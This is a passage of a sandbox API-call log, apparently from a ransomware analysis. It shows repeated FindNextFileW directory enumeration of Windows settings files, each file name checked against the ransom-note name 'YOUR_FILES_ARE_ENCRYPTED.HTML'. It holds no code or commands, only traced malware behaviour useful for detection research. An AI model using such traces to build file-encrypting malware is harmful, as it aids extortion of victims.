(pszPath="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms") returned=".settingcontent-ms" [0121.580] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.580] PathFindExtensionW (pszPath="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms") returned=".settingcontent-ms" [0121.580] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9634c035, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9634c035, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f3, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", cAlternateFileName="AAA_CL~2.SET")) returned 1 [0121.580] StrStrIW (lpFirst="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.580] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms") returned 195 [0121.580] PathFindExtensionW (pszPath="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms") returned=".settingcontent-ms" [0121.580] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.580] PathFindExtensionW (pszPath="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9653bff9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9653bff9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3df, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", cAlternateFileName="AAA_CL~3.SET")) returned 1 [0121.581] StrStrIW (lpFirst="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms") returned 195 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x967520dd, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x967520dd, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", cAlternateFileName="AAA_CL~4.SET")) returned 1 [0121.581] StrStrIW (lpFirst="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms") returned 195 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fd05f2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x96fd05f2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x233016ec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", cAlternateFileName="AA5F2E~1.SET")) returned 1 [0121.581] StrStrIW (lpFirst="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms") returned 195 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.581] PathFindExtensionW (pszPath="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97317979, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97317979, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", cAlternateFileName="AAA_PR~1.SET")) returned 1 [0121.581] StrStrIW (lpFirst="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms") returned 177 [0121.581] PathFindExtensionW (pszPath="AAA_Proxy_Automatic_Config_Group.settingcontent-ms") returned=".settingcontent-ms" [0121.581] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.581] PathFindExtensionW (pszPath="AAA_Proxy_Automatic_Config_Group.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976ab254, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x976ab254, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupAppSizesList.settingcontent-ms", cAlternateFileName="AAA_SE~1.SET")) returned 1 [0121.581] StrStrIW (lpFirst="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms") returned 174 [0121.581] PathFindExtensionW (pszPath="AAA_SettingsGroupAppSizesList.settingcontent-ms") returned=".settingcontent-ms" [0121.581] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.581] PathFindExtensionW (pszPath="AAA_SettingsGroupAppSizesList.settingcontent-ms") returned=".settingcontent-ms" [0121.581] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3ea55, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97a3ea55, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", cAlternateFileName="AAA_SE~2.SET")) returned 1 [0121.581] StrStrIW (lpFirst="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.581] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms") returned 178 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97ca0f7e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x97ca0f7e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", cAlternateFileName="AAA_SE~3.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms") returned 187 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982bd1ca, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x982bd1ca, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", cAlternateFileName="AAA_SE~4.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms") returned 187 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9947888a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9947888a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", cAlternateFileName="AA0FEE~1.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms") returned 184 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecc43b7e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xecc43b7e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", cAlternateFileName="AAB00A~1.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms") returned 182 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed534910, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xed534910, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", cAlternateFileName="AAEB38~1.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms") returned 177 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms") returned=".settingcontent-ms" [0121.582] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.582] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms") returned=".settingcontent-ms" [0121.582] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed796d2a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xed796d2a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", cAlternateFileName="AAD0AF~1.SET")) returned 1 [0121.582] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.582] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms") returned 179 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms") returned=".settingcontent-ms" [0121.583] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", cAlternateFileName="AAC64E~1.SET")) returned 1 [0121.583] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.583] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms") returned 184 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.583] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc81ced, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedc81ced, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", cAlternateFileName="AAD87B~1.SET")) returned 1 [0121.583] StrStrIW (lpFirst="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.583] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms") returned 184 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms") returned=".settingcontent-ms" [0121.583] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedfa2dee, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedfa2dee, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupFamilyUsers.settingcontent-ms", cAlternateFileName="AAD94F~1.SET")) returned 1 [0121.583] StrStrIW (lpFirst="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.583] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms") returned 173 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupFamilyUsers.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupFamilyUsers.settingcontent-ms") returned=".settingcontent-ms" [0121.583] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee29dc95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xee29dc95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x463, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupInputMouse.settingcontent-ms", cAlternateFileName="AAA063~1.SET")) returned 1 [0121.583] StrStrIW (lpFirst="AAA_SettingsGroupInputMouse.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.583] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms") returned 172 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupInputMouse.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupInputMouse.settingcontent-ms") returned=".settingcontent-ms" [0121.583] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7aec57, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xee7aec57, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x487, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", cAlternateFileName="AAE326~1.SET")) returned 1 [0121.583] StrStrIW (lpFirst="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.583] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms") returned 179 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupLockScreenPreview.settingcontent-ms") returned=".settingcontent-ms" [0121.583] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.583] PathFindExtensionW (pszPath="AAA_SettingsGroupLockScreenPreview.settingcontent-ms") returned=".settingcontent-ms" [0121.592] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef48586, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeef48586, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x456, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupMapsUpdates.settingcontent-ms", cAlternateFileName="AA7296~1.SET")) returned 1 [0121.594] StrStrIW 